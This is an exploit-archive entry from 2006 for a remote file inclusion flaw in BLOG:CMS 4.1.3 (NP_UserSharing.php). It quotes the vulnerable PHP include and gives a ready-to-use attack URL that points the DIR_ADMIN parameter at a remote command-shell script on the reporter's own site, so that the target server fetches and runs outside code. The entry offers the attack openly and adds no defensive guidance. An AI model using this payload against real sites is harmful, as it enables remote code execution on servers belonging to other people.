BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability

2006-12-12T00:00:00
ID 1337DAY-ID-1255
Type zdt
Reporter HACKERS PAL
Modified 2006-12-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
BLOG:CMS <= 4.1.3 (NP_UserSharing.php) Remote Inclusion Vulnerability
=====================================================================



BLOG:CMS Remote file include Vulnerability

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net

global $DIR_ADMIN;
include ( substr($DIR_ADMIN,0,strpos($DIR_ADMIN,'admin'))."photo".DIRECTORY_SEPARATOR."includes".DIRECTORY_SEPARATOR."user.class.php");

http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin



#  0day.today [2018-03-09]  #